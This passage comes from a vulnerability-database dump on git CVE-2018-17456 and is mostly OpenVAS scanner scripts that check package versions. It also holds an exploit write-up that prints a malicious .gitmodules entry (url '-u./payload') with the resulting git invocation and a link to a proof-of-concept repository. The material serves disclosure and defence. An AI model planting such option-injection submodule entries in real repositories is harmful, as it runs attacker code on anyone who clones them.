}\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:36:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220181388", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220181388", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2018-1388)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2018.1388\");\n script_version(\"2020-01-23T11:24:13+0000\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:24:13 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:24:13 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2018-1388)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2018-1388\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1388\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2018-1388 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"git: arbitrary code execution via .gitmodules (CVE-2018-17456)\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS V2.0SP3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~20.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~20.h1\", rls:\"EULEROS-2.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:33:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191183", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191183", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-1183)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1183\");\n script_version(\"2020-01-23T11:33:56+0000\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:33:56 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:33:56 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-1183)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-2\\.5\\.3\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1183\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1183\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2019-1183 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An option injection flaw has been discovered in git when it recursively clones a repository with sub-modules. 
A remote attacker may configure a malicious repository and trick a user into recursively cloning it, thus executing arbitrary commands on the victim's machine. CVE-2018-17456\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS Virtualization 2.5.3.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-2.5.3\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~20.h1\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~20.h1\", rls:\"EULEROSVIRT-2.5.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:35:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191291", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191291", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-1291)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free 
Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1291\");\n script_version(\"2020-01-23T11:37:54+0000\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:37:54 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:37:54 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-1291)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1291\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1291\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2019-1291 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"git: 
arbitrary code execution via .gitmodules (CVE-2018-17456)\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~20.h1.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~20.h1.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:39:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2018-10-13T00:00:00", "id": "OPENVAS:1361412562310851934", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851934", "type": "openvas", "title": "openSUSE: Security Advisory for git (openSUSE-SU-2018:3109-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the 
hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851934\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-13 06:54:28 +0200 (Sat, 13 Oct 2018)\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for git (openSUSE-SU-2018:3109-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for git fixes the following issues:\n\n - CVE-2018-17456: Git allowed remote code execution during processing of a\n recursive 'git clone' of a superproject if a .gitmodules file has a URL\n field beginning with a '-' character. 
(boo#1110949).\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-1147=1\");\n\n script_tag(name:\"affected\", value:\"git on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3109-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-10/msg00028.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-arch\", rpm:\"git-arch~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-core\", rpm:\"git-core~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-core-debuginfo\", rpm:\"git-core-debuginfo~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-gnome-keyring\", rpm:\"git-credential-gnome-keyring~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = 
isrpmvuln(pkg:\"git-credential-gnome-keyring-debuginfo\", rpm:\"git-credential-gnome-keyring-debuginfo~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-cvs\", rpm:\"git-cvs~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon\", rpm:\"git-daemon~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon-debuginfo\", rpm:\"git-daemon-debuginfo~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-debugsource\", rpm:\"git-debugsource~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-email\", rpm:\"git-email~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-gui\", rpm:\"git-gui~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn\", rpm:\"git-svn~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn-debuginfo\", rpm:\"git-svn-debuginfo~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-web\", rpm:\"git-web~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gitk\", rpm:\"gitk~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-doc\", rpm:\"git-doc~2.13.7~16.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-06T16:45:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "description": "The remote host is missing an update for the ", 
"modified": "2020-02-06T00:00:00", "published": "2020-02-04T00:00:00", "id": "OPENVAS:1361412562310883176", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310883176", "type": "openvas", "title": "CentOS: Security Advisory for emacs-git (CESA-2020:0316)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.883176\");\n script_version(\"2020-02-06T07:28:53+0000\");\n script_cve_id(\"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-06 07:28:53 +0000 (Thu, 06 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-02-04 04:00:25 +0000 (Tue, 04 Feb 2020)\");\n script_name(\"CentOS: Security Advisory for emacs-git (CESA-2020:0316)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n\n script_xref(name:\"CESA\", value:\"2020:0316\");\n script_xref(name:\"URL\", value:\"https://lists.centos.org/pipermail/centos-announce/2020-February/035619.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'emacs-git'\n package(s) announced via the CESA-2020:0316 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Git is a distributed revision control system with a decentralized\narchitecture. As opposed to centralized version control systems with a\nclient-server model, Git ensures that each working copy of a Git repository\nis an exact copy with complete revision history. This not only allows the\nuser to work on and contribute to projects without the need to have\npermission to push the changes to their official repositories, but also\nmakes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n * git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section.\");\n\n script_tag(name:\"affected\", value:\"'emacs-git' package(s) on CentOS 6.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"CentOS6\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"emacs-git\", rpm:\"emacs-git~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n 
if(!isnull(res = isrpmvuln(pkg:\"emacs-git-el\", rpm:\"emacs-git-el~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-all\", rpm:\"git-all~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-cvs\", rpm:\"git-cvs~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon\", rpm:\"git-daemon~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-email\", rpm:\"git-email~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-gui\", rpm:\"git-gui~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gitk\", rpm:\"gitk~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn\", rpm:\"git-svn~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gitweb\", rpm:\"gitweb~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.7.1~10.el6_10\", rls:\"CentOS6\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:17", "description": "\nGit Submodule - Arbitrary Code Execution (PoC)", "edition": 1, "published": "2018-10-05T00:00:00", "title": "Git Submodule - Arbitrary Code Execution (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17456"], "modified": "2018-10-05T00:00:00", "id": "EXPLOITPACK:2356A63C4E4DC65BBDDE2BC00C9D7F2F", "href": "", "sourceData": "These releases fix a 
security flaw (CVE-2018-17456), which allowed an\nattacker to execute arbitrary code by crafting a malicious .gitmodules\nfile in a project cloned with --recurse-submodules.\n\nWhen running \"git clone --recurse-submodules\", Git parses the supplied\n.gitmodules file for a URL field and blindly passes it as an argument\nto a \"git clone\" subprocess. If the URL field is set to a string that\nbegins with a dash, this \"git clone\" subprocess interprets the URL as\nan option. This can lead to executing an arbitrary script shipped in\nthe superproject as the user who ran \"git clone\".\n\nIn addition to fixing the security issue for the user running \"clone\",\nthe 2.17.2, 2.18.1 and 2.19.1 releases have an \"fsck\" check which can\nbe used to detect such malicious repository content when fetching or\naccepting a push. See \"transfer.fsckObjects\" in git-config(1).\n\nCredit for finding and fixing this vulnerability goes to joernchen\nand Jeff King, respectively.\n\nP.S. Folks at Microsoft tried to follow the known exploit recipe on\nGit for Windows (but not Cygwin or other Git implementations on\nWindows) and found that the recipe (or its variants they can think\nof) would not make their system vulnerable. This is due to the fact\nthat the type of submodule path required by the known exploit recipe\ncannot be created on Windows. 
Nonetheless, it is possible we have\nmissed some exploitation path and users are encouraged to upgrade.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:17", "description": "\nGit Submodule - Arbitrary Code Execution", "edition": 1, "published": "2018-10-16T00:00:00", "title": "Git Submodule - Arbitrary Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-10-16T00:00:00", "id": "EXPLOITPACK:D64F350BE20BAAEB14556BDB6D8B4C0D", "href": "", "sourceData": "# CVE-2018-17456\n\nI've gotten a couple of questions about exploitation for the\n[recent RCE](https://marc.info/?l=git&m=153875888916397&w=2) in Git. So here we\ngo with some technical details.\n\n## TL;DR\n\n[Here](https://github.com/joernchen/poc-submodule) is a PoC repository.\nEDB Note: Mirror ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45631.zip\n\n## Exploitation\n\nThe `.gitmodules` file looks as follows:\n\n```\n[submodule \"x:x\"]\n\tpath = x:x\n\turl = -u./payload\n```\n\nThe actual command being injected is set by the url, `-u./payload`\npoints the `upload-pack` flag of git clone to the `payload` shell\nscript. 
Note also the `:` within the path, this part is needed to\nactually get the `payload` script executed.\n\nThe path will end up as the repository URL in the subsequent `clone`\noperation:\n\n```\nexecve(\"/usr/lib/git-core/git\", [\"/usr/lib/git-core/git\", \"clone\",\n\"--no-checkout\", \"--progress\", \"--separate-git-dir\",\n\"/tmp/huhu/.git/modules/x:x\", \"-u./payload\", \"/tmp/huhu/x:x\"],...\n```\n\nAs the actual URL from `.gitmodules` is interpreted as the `-u`\nargument.\n\nThe colon is due to the fact that the colon character lets us go past\nthose lines in `transport.c`:\n\n```c\n } else if (url_is_local_not_ssh(url) && is_file(url) && is_bundle(url, 1)) {\n struct bundle_transport_data *data = xcalloc(1, sizeof(*data));\n transport_check_allowed(\"file\");\n ret->data = data;\n ret->vtable = &bundle_vtable;\n ret->smart_options = NULL;\n```\n\nThis is because `url_is_local_not_ssh` will return false due to the colon\nin the path. And therefore later on in the code the smart_options\ncontaining the `uploadpack` setting are still in place:\n\n```c\n } else {\n\t\t/* Unknown protocol in URL. Pass to external handler. */\n\t\tint len = external_specification_len(url);\n\t\tchar *handler = xmemdupz(url, len);\n\t\ttransport_helper_init(ret, handler);\n\t}\n\n\tif (ret->smart_options) {\n\t\tret->smart_options->thin = 1;\n\t\tret->smart_options->uploadpack = \"git-upload-pack\";\n\t\tif (remote->uploadpack)\n\t\t\tret->smart_options->uploadpack = remote->uploadpack;\n\t\tret->smart_options->receivepack = \"git-receive-pack\";\n\t\tif (remote->receivepack)\n\t\t\tret->smart_options->receivepack = remote->receivepack;\n\t}\n```\n\n## Further hints\n\nThe constraint to have a colon in the `path` seems to hinder exploitation on Windows\nas a colon is a forbidden character within a path on Windows. 
However as noted by\nsome people during the disclosure: Git running within the Windows Subsystem for Linux or\ncygwin will allow exploitation on Windows hosts.\n\nEtienne Stalmans who found [a similar issue](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/)\nearlier this year managed to exploit this argument injection [using `--template`](https://twitter.com/_staaldraad/status/1049241254939246592).", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:47:12", "bulletinFamily": "unix", "cvelist": ["CVE-2018-17456"], "description": "Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es):\n\n* git: arbitrary code execution via .gitmodules (CVE-2018-17456)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2018-10-30T19:08:46", "published": 